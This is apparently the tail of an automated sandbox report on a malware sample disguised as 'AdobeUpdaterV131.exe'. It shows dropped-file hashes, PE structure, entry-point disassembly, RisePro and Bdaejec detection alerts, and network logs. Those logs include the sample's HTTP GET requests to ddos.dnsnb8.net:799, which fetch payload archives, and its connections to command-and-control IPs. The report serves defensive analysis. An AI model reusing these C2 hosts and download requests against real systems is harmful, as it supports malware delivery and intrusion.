                                    SHA-512:40A592E9DE0C49A4E4980037BF79984573F022144F900F684DA3CB62B356D85037A75CA30C5C908424BE99988C04C9CBEAFF5BB8F024DD02884895F26DB686B1
                                    Malicious:false
                                    Preview:1721861467039
                                    Process:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):15872
                                    Entropy (8bit):7.031075575407894
                                    Encrypted:false
                                    SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                    MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                    SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                    SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                    SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Joe Sandbox View:
                                    • Filename: AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exe, Detection: malicious, Browse
                                    • Filename: AIBIJIAO 12.exe, Detection: malicious, Browse
                                    • Filename: ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exe, Detection: malicious, Browse
                                    • Filename: AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exe, Detection: malicious, Browse
                                    • Filename: aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe, Detection: malicious, Browse
                                    • Filename: ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exe, Detection: malicious, Browse
                                    • Filename: 7Y18r(224).exe, Detection: malicious, Browse
                                    • Filename: A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exe, Detection: malicious, Browse
                                    • Filename: A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exe, Detection: malicious, Browse
                                    • Filename: A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.465957436664081
                                    Encrypted:false
                                    SSDEEP:6144:XIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSbn:YXD94+WlLZMM6YFHS+n
                                    MD5:FB9CD11F62FAE73069EF556B732BDC2E
                                    SHA1:E4EE71C79A1920E471383E7554F0C80F1AEC0132
                                    SHA-256:5AA6847E6E1D258CA84DBEFBEDBE9F796CE5C9AD4DAA2AADC437E3806012D296
                                    SHA-512:C631DB8D167C6386F05758A529A0BFCB9C0CB22E582CB6839335CE9AF891EFA75269C8D82B952125DD504F38714FEA7846398A55C0069C54B166260509AB46B6
                                    Malicious:false
                                    Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.956902857826616
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:AdobeUpdaterV131.exe
                                    File size:2'342'912 bytes
                                    MD5:0bfb030dcbf461f2c76087e4b9856836
                                    SHA1:75425a8dc79a21373520a241a7c51d9a1ce7e91a
                                    SHA256:bdb5f42b5e4709134a4f963b9648af4f8e19e2011937f72ff3b75488887e3f14
                                    SHA512:618971540126ef2759bd98e1df88c2460a5d180994e5e709289889bdcb877e02c34859ac07051bf1e6c158ff5d51f58d1e9e49a44759762aa959854671f67f50
                                    SSDEEP:49152:31Ev2MLvP7P2ECifSC5oPo/wf/5FUzuJpzzX2iFEQaKmULewa:32DvTP2PiLds/5KzGn9WQFSwa
                                    TLSH:99B533D28CB25562D25B2B7E57030703AB9F8CC32B2614862A69F6F13FBE7314562F15
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....
                                    Icon Hash:07316cc4cc693307
                                    Entrypoint:0x9a0000
                                    Entrypoint Section:u
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65BB8083 [Thu Feb 1 11:29:07 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0000016Ch
                                    xor eax, eax
                                    push ebx
                                    push esi
                                    push edi
                                    mov dword ptr [ebp-24h], eax
                                    mov dword ptr [ebp-10h], eax
                                    mov dword ptr [ebp-14h], eax
                                    mov dword ptr [ebp-08h], eax
                                    mov dword ptr [ebp-0Ch], eax
                                    mov dword ptr [ebp-20h], eax
                                    mov dword ptr [ebp-18h], eax
                                    mov dword ptr [ebp-48h], 2E705278h
                                    mov dword ptr [ebp-44h], 00657865h
                                    mov dword ptr [ebp-40h], 00000000h
                                    mov dword ptr [ebp-3Ch], 00000000h
                                    call 00007F09D104CDB5h
                                    pop eax
                                    add eax, 00000225h
                                    mov dword ptr [ebp-04h], eax
                                    mov eax, dword ptr fs:[00000030h]
                                    mov dword ptr [ebp-28h], eax
                                    mov eax, dword ptr [ebp-04h]
                                    mov dword ptr [eax], E904C483h
                                    mov eax, dword ptr [ebp-04h]
                                    mov dword ptr [eax+04h], FFFFCD8Fh
                                    mov eax, dword ptr [ebp-28h]
                                    mov eax, dword ptr [eax+0Ch]
                                    mov eax, dword ptr [eax+1Ch]
                                    mov eax, dword ptr [eax]
                                    mov eax, dword ptr [eax+08h]
                                    mov ecx, dword ptr [eax+3Ch]
                                    mov ecx, dword ptr [ecx+eax+78h]
                                    add ecx, eax
                                    mov edi, dword ptr [ecx+1Ch]
                                    mov ebx, dword ptr [ecx+20h]
                                    mov esi, dword ptr [ecx+24h]
                                    mov ecx, dword ptr [ecx+18h]
                                    add esi, eax
                                    add edi, eax
                                    add ebx, eax
                                    xor edx, edx
                                    mov dword ptr [ebp-30h], esi
                                    mov dword ptr [ebp-1Ch], edx
                                    mov dword ptr [ebp-34h], ecx
                                    cmp edx, dword ptr [ebp-34h]
                                    jnc 00007F09D104CEFEh
                                    movzx ecx, word ptr [esi+edx*2]
                                    mov edx, dword ptr [ebx+edx*4]
                                    mov esi, dword ptr [edi+ecx*4]
                                    add edx, eax
                                    mov ecx, dword ptr [edx]
                                    add esi, eax
                                    cmp ecx, 4D746547h
                                    jne 00007F09D104CE04h
                                    cmp dword ptr [edx+04h], 6C75646Fh
                                    jne 00007F09D104CDFBh
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x13b0570x6b.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1360000x43b0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x13b1f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x1350000x8e800fad6a260da2c3ae54cf441e7363aae49False0.999878358004386data7.980927554299119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1360000x43b00x12002287e35590bf0cb868f43cb8297b90eeFalse0.9405381944444444data7.670550810405519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x13b0000x10000x200ce7e7ba3b7e1f44d5bf269a78760122dFalse0.150390625data1.0530589234904126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x13c0000x2bb0000x200fdf9e0a2d95953f46de7bbb6c82eea2aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    czumqxku0x3f70000x1a50000x1a4a00a52e5ed1b15e17f7eb70f0bf67f3c6e4False0.9875069650817236data7.951415630425814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    oiivdxoz0x59c0000x10000x4009f6a2d8879bf6d5a834ea44c84ddbee1False0.7861328125data6.090888886334667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x59d0000x30000x2200f149e84db479ef7d15612a021738f2caFalse0.07123161764705882DOS executable (COM)0.8613319130180853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    u0x5a00000x50000x4200050c15d33af2e2cb3b4dbf2a055c64f1False0.77734375data6.933507194790652IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x5977e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mRussianRussia0.40691489361702127
                                    RT_ICON0x597c500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mRussianRussia0.25656660412757976
                                    RT_ICON0x598cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mRussianRussia0.19190871369294607
                                    RT_GROUP_ICON0x59b2a00x30dataRussianRussia0.8125
                                    RT_VERSION0x59b2d00x2b8COM executable for DOSRussianRussia0.4899425287356322
                                    RT_MANIFEST0x59b5880x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                    RT_MANIFEST0x59b86e0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                    DLLImport
                                    kernel32.dlllstrcpy
                                    Language of compilation systemCountry where language is spokenMap
                                    RussianRussia
                                    EnglishUnited States
                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                    2024-07-24T23:02:23.672844+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49751799192.168.2.444.221.84.105
                                    2024-07-24T23:02:02.179085+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973250500192.168.2.4193.233.132.62
                                    2024-07-24T23:02:21.179501+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49749799192.168.2.444.221.84.105
                                    2024-07-24T23:02:06.867202+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973850500192.168.2.4193.233.132.62
                                    2024-07-24T23:02:06.867241+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973750500192.168.2.4193.233.132.62
                                    2024-07-24T23:02:50.529437+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434975413.85.23.86192.168.2.4
                                    2024-07-24T23:01:54.455790+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49730799192.168.2.444.221.84.105
                                    2024-07-24T23:01:59.210478+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4973250500192.168.2.4193.233.132.62
                                    2024-07-24T23:02:13.192674+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974513.85.23.86192.168.2.4
                                    2024-07-24T23:02:24.179265+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4975050500192.168.2.4193.233.132.62
                                    2024-07-24T23:02:16.085891+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4974750500192.168.2.4193.233.132.62
                                    2024-07-24T23:02:13.348213+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49746443192.168.2.420.42.73.29
                                    2024-07-24T23:02:30.315987+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49753799192.168.2.444.221.84.105
                                    2024-07-24T23:01:59.277372+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49731799192.168.2.444.221.84.105
                                    2024-07-24T23:02:18.300399+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49748799192.168.2.444.221.84.105
                                    2024-07-24T23:02:26.815817+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49752799192.168.2.444.221.84.105
                                    2024-07-24T23:01:53.959653+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5477053192.168.2.41.1.1.1
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 24, 2024 23:01:54.069199085 CEST49730799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:54.074023008 CEST7994973044.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:54.074652910 CEST49730799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:54.074652910 CEST49730799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:54.079530001 CEST7994973044.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:54.455583096 CEST7994973044.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:54.455725908 CEST7994973044.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:54.455790043 CEST49730799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:54.455790043 CEST49730799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:54.466489077 CEST49730799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:54.471560001 CEST7994973044.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:58.827625036 CEST49731799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:58.832779884 CEST7994973144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:58.832875013 CEST49731799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:58.838676929 CEST49731799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:58.843839884 CEST7994973144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:59.188435078 CEST4973250500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:01:59.193525076 CEST5050049732193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:01:59.193608999 CEST4973250500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:01:59.210478067 CEST4973250500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:01:59.215634108 CEST5050049732193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:01:59.277219057 CEST7994973144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:59.277246952 CEST7994973144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:01:59.277371883 CEST49731799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:59.298573971 CEST49731799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:01:59.553520918 CEST7994973144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:02.179085016 CEST4973250500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:02.184036016 CEST5050049732193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:03.815967083 CEST4973750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:03.816858053 CEST4973850500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:03.880575895 CEST5050049737193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:03.880605936 CEST5050049738193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:03.880675077 CEST4973750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:03.880675077 CEST4973850500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:03.909684896 CEST4973850500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:03.912796021 CEST4973750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:03.926983118 CEST5050049738193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:03.927030087 CEST5050049737193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:06.867202044 CEST4973850500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:06.867240906 CEST4973750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:06.907049894 CEST5050049738193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:06.907474995 CEST5050049737193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:13.088603020 CEST4974750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:13.096152067 CEST5050049747193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:13.096242905 CEST4974750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:13.115951061 CEST4974750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:13.122910976 CEST5050049747193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:16.085891008 CEST4974750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:16.092010021 CEST5050049747193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:17.764566898 CEST49748799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:17.872101068 CEST7994974844.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:17.872200012 CEST49748799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:17.872765064 CEST49748799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:17.878278017 CEST7994974844.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:18.300318003 CEST7994974844.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:18.300399065 CEST49748799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:18.303442001 CEST7994974844.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:18.303518057 CEST49748799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:18.304910898 CEST49748799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:18.316240072 CEST7994974844.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:20.541172028 CEST49749799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:20.546658993 CEST7994974944.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:20.546777010 CEST49749799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:20.546958923 CEST49749799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:20.554620981 CEST7994974944.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:20.584566116 CEST5050049732193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:20.584652901 CEST4973250500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:20.978498936 CEST4975050500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:21.179239988 CEST7994974944.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:21.179261923 CEST7994974944.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:21.179270983 CEST7994974944.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:21.179501057 CEST49749799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:21.179501057 CEST49749799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:21.180563927 CEST49749799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:21.186887026 CEST5050049750193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:21.186943054 CEST7994974944.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:21.186971903 CEST4975050500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:21.216208935 CEST4975050500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:21.275276899 CEST5050049750193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:23.205265999 CEST49751799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:23.210485935 CEST7994975144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:23.210599899 CEST49751799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:23.211795092 CEST49751799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:23.217004061 CEST7994975144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:23.672770023 CEST7994975144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:23.672833920 CEST7994975144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:23.672843933 CEST49751799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:23.672909975 CEST49751799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:23.684767008 CEST49751799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:23.690176964 CEST7994975144.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:24.179265022 CEST4975050500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:24.184369087 CEST5050049750193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:25.276252031 CEST5050049737193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:25.276336908 CEST4973750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:25.277502060 CEST5050049738193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:25.277554989 CEST4973850500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:26.413218021 CEST49752799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:26.418378115 CEST7994975244.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:26.418472052 CEST49752799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:26.419012070 CEST49752799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:26.424474001 CEST7994975244.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:26.815747976 CEST7994975244.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:26.815817118 CEST49752799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:26.815898895 CEST7994975244.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:26.815943003 CEST49752799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:26.817121029 CEST49752799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:26.822128057 CEST7994975244.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:29.893059969 CEST49753799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:29.898217916 CEST7994975344.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:29.898323059 CEST49753799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:29.901801109 CEST49753799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:29.906738043 CEST7994975344.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:30.315823078 CEST7994975344.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:30.315876961 CEST7994975344.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:30.315987110 CEST49753799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:30.316050053 CEST49753799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:30.317056894 CEST49753799192.168.2.444.221.84.105
                                    Jul 24, 2024 23:02:30.322189093 CEST7994975344.221.84.105192.168.2.4
                                    Jul 24, 2024 23:02:34.559953928 CEST5050049747193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:34.560031891 CEST4974750500192.168.2.4193.233.132.62
                                    Jul 24, 2024 23:02:42.558588028 CEST5050049750193.233.132.62192.168.2.4
                                    Jul 24, 2024 23:02:42.558706045 CEST4975050500192.168.2.4193.233.132.62
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 24, 2024 23:01:53.959652901 CEST5477053192.168.2.41.1.1.1
                                    Jul 24, 2024 23:01:54.063004017 CEST53547701.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jul 24, 2024 23:01:53.959652901 CEST192.168.2.41.1.1.10xf6Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jul 24, 2024 23:01:54.063004017 CEST1.1.1.1192.168.2.40xf6No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                    • ddos.dnsnb8.net:799
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.44973044.221.84.1057996568C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 24, 2024 23:01:54.074652910 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.44973144.221.84.1057996568C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 24, 2024 23:01:58.838676929 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.44974844.221.84.1057998120C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 24, 2024 23:02:17.872765064 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.44974944.221.84.1057998120C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 24, 2024 23:02:20.546958923 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.44975144.221.84.1057998120C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
